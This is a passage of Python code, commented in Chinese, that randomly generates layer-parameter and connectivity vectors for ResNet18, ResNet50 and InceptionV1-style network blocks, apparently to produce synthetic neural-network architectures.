if out_channel > 1000:
out_channel = self.prob_random([in_channel,int(in_channel/2),int(in_channel/3)],[0.05,0.7,0.25])
out_height = final_output_size[2]
if in_height == out_height:
right_res_id = self.layer_num - 1
#加入 #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,in_channel, 3,3, 1,1, 1,1, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 conv2d
conv_params = [in_channel,in_channel, 3,3, 1,1, 1,1, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#print('left',last_layer_input_size)
left_res_id = self.layer_num - 1
if(random.randint(1,100) < 30):
#加入 right #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,in_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 right #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 right #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
right_res_id = self.layer_num - 1
#print('right',last_layer_input_size)
elif in_height == 2 * out_height:
#加入 left #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,out_channel, 3,3, 2,2, 1,1, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 left #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 left #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 left #4 conv2d
conv_params = [out_channel,out_channel, 3,3, 1,1, 1,1, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 left #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
left_res_id = self.layer_num - 1
#print('left',last_layer_input_size)
#加入 right #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,out_channel, 1,1, 2,2, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 right #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 right #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#print('right',last_layer_input_size)
right_res_id = self.layer_num - 1
else:
print('wrong')
#加入残差连接
add_index_list = [left_res_id,right_res_id]
params = self.make_layer(24,last_layer_input_size,add_num=len(add_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(add_index_list,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
#加入ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#print('resnet18block',last_layer_input_size)
return self.layer_num - 1, last_layer_input_size
def make_resnet50_block(self,last_block_index,input_size,final_output_size):
'''
已改
Resnet 残差模块,包括左右两部分
stride=2 → in_height == 2*out_height 包括左右两部分
(bottleneck): Sequential(
(0): Conv2d(inp, hidden, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(hidden, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(inplace=True)
(3): Conv2d(hidden, hidden, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(4): BatchNorm2d(hidden, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(5): ReLU(inplace=True)
(6): Conv2d(hidden, otp, kernel_size=(1, 1), stride=(1, 1), bias=False)
(7): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(downsample): Sequential(
(0): Conv2d(inp, otp, kernel_size=(1, 1), stride=(2, 2), bias=False)
(1): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(relu): ReLU(inplace=True)
stride=1 → in_height == out_height 包括左
(left): Sequential(
(0): Conv2d(inp, hidden, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(hidden, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(inplace=True)
(3): Conv2d(hidden, hidden, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(4): BatchNorm2d(hidden, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(5): ReLU(inplace=True)
(6): Conv2d(hidden, inp, kernel_size=(1, 1), stride=(1, 1), bias=False)
(7): BatchNorm2d(inp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
#可无 10%几率有
(downsample): Sequential(
(0): Conv2d(inp, inp, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(inp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(relu): ReLU(inplace=True)
'''
in_channel,in_height = input_size[1],input_size[2]
out_channel = self.prob_random([in_channel,int(in_channel*2)],[0.8,0.2])
if out_channel > 1000:
out_channel = self.prob_random([in_channel,int(in_channel/2),int(in_channel/3)],[0.05,0.7,0.25])
out_height = final_output_size[2]
if in_height == out_height:
right_res_id = self.layer_num - 1
hidden = self.prob_random([int(in_channel*0.5),int(in_channel * 0.25)],[0.5,0.5])
#加入 #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,hidden, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 conv2d
conv_params = [hidden,hidden, 3,3, 1,1, 1,1, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #6 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #7 conv2d
conv_params = [hidden,in_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #8 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
left_res_id = self.layer_num - 1
if(random.randint(1,100) < 10):
#加入 right #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,in_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 right #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
right_res_id = self.layer_num - 1
elif in_height == 2 * out_height:
right_res_id = self.layer_num - 1
hidden = self.prob_random([int(in_channel*0.5),int(in_channel * 0.33),int(in_channel * 0.25)],[0.8,0.1,0.1])
#加入 #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,hidden, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 conv2d
conv_params = [hidden,hidden, 3,3, 2,2, 1,1, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #6 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #7 conv2d
conv_params = [hidden,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #8 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
left_res_id = self.layer_num - 1
#加入 right #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,out_channel, 1,1, 2,2, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 right #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
right_res_id = self.layer_num - 1
else:
print('wrong')
#加入残差连接
add_index_list = [left_res_id,right_res_id]
params = self.make_layer(24,last_layer_input_size,add_num=len(add_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(add_index_list,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
#print('resnet50block',last_layer_input_size)
return self.layer_num - 1,last_layer_input_size
def make_inceptionV1_pre(self,last_block_index,input_size,final_output_size):
'''
inceptionV1 初始层
nn.Conv2d(in_channels=3,out_channels=64,kernel_size=7,stride=2,padding=3),
nn.BatchNorm2d(64),
nn.MaxPool2d(kernel_size=3,stride=2, padding=1),
nn.Conv2d(in_channels=64, out_channels=64, kernel_size=1, stride=1),
nn.BatchNorm2d(64),
[1, 64, 56, 56]
'''
last_layer_input_size = input_size
#加入 #1 conv2d
in_channel = input_size[1]
out_channel = random.randint(56,72)
conv_params = [in_channel,out_channel, 7,7, 2,2, 3,3, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 pooling
pooling_params = [3,3, 2,2, 1,1, 1,1, 0]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
params = last_layer_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #4 conv2d
in_channel = input_size[1]
conv_params = [out_channel,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + final_output_size + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#print('inceptionpre',last_layer_input_size)
return self.layer_num - 1, last_layer_input_size #返回该线性序列的最后一个节点的索引号
def make_inceptionV1_block2(self,last_block_index,input_size,final_output_size):
'''
inceptionV1 block2
nn.Conv2d(in_channels=inp, out_channels=otp, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(otp),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
'''
#加入 #1 conv2d
in_channel = input_size[1]
out_channel = self.prob_random([int(in_channel),int(in_channel*2),int(in_channel*3)],[0.8,0.1,0.1])
if out_channel > 1000:
out_channel = self.prob_random([int(in_channel/2),int(in_channel/3)],[0.8,0.2])
conv_params = [in_channel,out_channel, 3,3, 1,1, 1,1, 1,1, 1]
params = input_size + final_output_size + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 pooling
pooling_params = [3,3, 2,2, 1,1, 1,1, 0]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
params = last_layer_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#print('make_inceptionV1_block2',last_layer_input_size)
return self.layer_num - 1, last_layer_input_size
def make_inceptionV1_block(self,last_block_index,input_size,final_output_size):
'''
>200可用
InceptionV1Module
self.branch1 = ConvBNReLU(in_channels=inp,out_channels=out_channels1,kernel_size=1)
self.branch2 = nn.Sequential(ConvBNReLU(in_channels=inp,out_channels=out_channels2reduce,kernel_size=1),
ConvBNReLU(in_channels=out_channels2reduce,out_channels=out_channels2,kernel_size=3))
self.branch3 = nn.Sequential(ConvBNReLU(in_channels=inp, out_channels=out_channels3reduce, kernel_size=1),
ConvBNReLU(in_channels=out_channels3reduce, out_channels=out_channels3, kernel_size=5))
self.branch4 = nn.Sequential(nn.MaxPool2d(kernel_size=3,stride=1,padding=1),
ConvBNReLU(in_channels=inp, out_channels=out_channels4, kernel_size=1))
ConvBNReLU(in_channels,out_channels,kernel_size):
return nn.Sequential(
nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=1,padding=kernel_size//2),
nn.BatchNorm2d(out_channels),
nn.ReLU6(inplace=True)
)
nn.MaxPool2d(kernel_size=3, stride=2, padding=1), # 50%概率加
'''
in_channel = input_size[1]
out_channel = final_output_size[1]
# block_type = self.prob_random([1,2,3,4,5,6,7,8,9],[0.08,0.06,0.11,0.14,0.16,0.12,0.08,0.15,0.1])
if in_channel > 800:
in_channel = int(in_channel/2)
out_channel_1 = random.randint(int(in_channel/4),int(in_channel/2))
out_channel_2 = random.randint(int(in_channel*0.33),int(in_channel*0.66))
out_channel_2_hidden = self.prob_random([int(out_channel_2*0.2),int(out_channel_2*0.5)],[0.5,0.5])
out_channel_3 = random.randint(int(in_channel*0.1),int(in_channel*0.375))
out_channel_3_hidden = self.prob_random([int(out_channel_3/2),int(out_channel_3/3),int(out_channel_3/4)],[0.33,0.33,0.34])
out_channel_4 = random.randint(int(in_channel/4),int(in_channel/2))
#1.333
# if block_type == 1:
# out_channel_1 = int(in_channel/3)
# out_channel_2 = int(in_channel/3) * 2
# out_channel_2_hidden = int(out_channel_2/2)
# out_channel_3 = int(in_channel/6)
# out_channel_3_hidden = int(out_channel_3/2)
# out_channel_4 = int(in_channel/6)
# #1.875
# elif block_type == 2:
# out_channel_1 = int(in_channel/2)
# out_channel_2 = int(in_channel * 0.75)
# out_channel_2_hidden = int(in_channel/2)
# out_channel_3 = int(in_channel* 0.375)
# out_channel_3_hidden = int(out_channel_3/3)
# out_channel_4 = int(in_channel/4)
# #1.067
# elif block_type == 3:
# out_channel_1 = int(in_channel*0.4)
# out_channel_2 = int(in_channel * 0.43)
# out_channel_2_hidden = int(in_channel * 0.2)
# out_channel_3 = int(in_channel* 0.1)
# out_channel_3_hidden = int(out_channel_3/3)
# out_channel_4 = int(in_channel * 0.133)
# #1
# elif block_type == 4:
# out_channel_1 = int(in_channel*0.3125)
# out_channel_2 = int(in_channel * 0.4375)
# out_channel_2_hidden = int(out_channel_2/2)
# out_channel_3 = int(in_channel* 0.125)
# out_channel_3_hidden = int(out_channel_3 * 0.375)
# out_channel_4 = int(in_channel*0.125)
# #1
# elif block_type == 5:
# out_channel_1 = int(in_channel*0.25)
# out_channel_2 = int(in_channel * 0.5)
# out_channel_2_hidden = int(out_channel_2/2)
# out_channel_3 = int(in_channel* 0.125)
# out_channel_3_hidden = int(out_channel_3 * 0.375)
# out_channel_4 = int(in_channel*0.125)
# #1.03125
# elif block_type == 6:
# out_channel_1 = int(in_channel*0.21875)
# out_channel_2 = int(in_channel * 0.5625)
# out_channel_2_hidden = int(out_channel_2/2)
# out_channel_3 = int(in_channel* 0.125)
# out_channel_3_hidden = int(out_channel_3 /2)
# out_channel_4 = int(in_channel*0.125)
# #1.5758
# elif block_type == 7:
# out_channel_1 = int(in_channel*0.485)
# out_channel_2 = int(in_channel * 0.606)
# out_channel_2_hidden = int(out_channel_2/2)
# out_channel_3 = int(in_channel* 0.2424)
# out_channel_3_hidden = int(out_channel_3 /4)
# out_channel_4 = int(in_channel*0.2424)
# #1
# elif block_type == 8:
# out_channel_1 = int(in_channel*0.3077)
# out_channel_2 = int(in_channel * 0.3846)
# out_channel_2_hidden = int(out_channel_2/2)
# out_channel_3 = int(in_channel* 0.1538)
# out_channel_3_hidden = int(out_channel_3 /4)
# out_channel_4 = int(in_channel*0.1538)
# #1.2367
# elif block_type == 9:
# out_channel_1 = int(in_channel*0.4615)
# out_channel_2 = int(in_channel * 0.4615)
# out_channel_2_hidden = int(out_channel_2/2)
# out_channel_3 = int(in_channel* 0.1538)
# out_channel_3_hidden = int(out_channel_3 /3)
# out_channel_4 = int(in_channel*0.1538)
branch1_index = last_block_index
#加入 Branch1 #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,out_channel_1, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Branch1 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 Branch1 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
branch1_res_index = self.layer_num - 1
#加入 Branch2 #1 conv2d
in_channel = input_size[1]
out_channel = final_output_size[1]
conv_params = [in_channel,out_channel_2_hidden, 1,1, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Branch2 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 Branch2 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 Branch2 #4 conv2d
conv_params = [out_channel_2_hidden,out_channel_2, 3,3, 1,1, 1,1, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Branch2 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 Branch2 #6 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
branch2_res_index = self.layer_num - 1
#加入 Branch3 #1 conv2d
in_channel = input_size[1]
out_channel = final_output_size[1]
conv_params = [in_channel,out_channel_3_hidden, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Branch3 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 Branch3 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 Branch3 #4 conv2d
conv_params = [out_channel_3_hidden,out_channel_3, 5,5, 1,1, 2,2, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
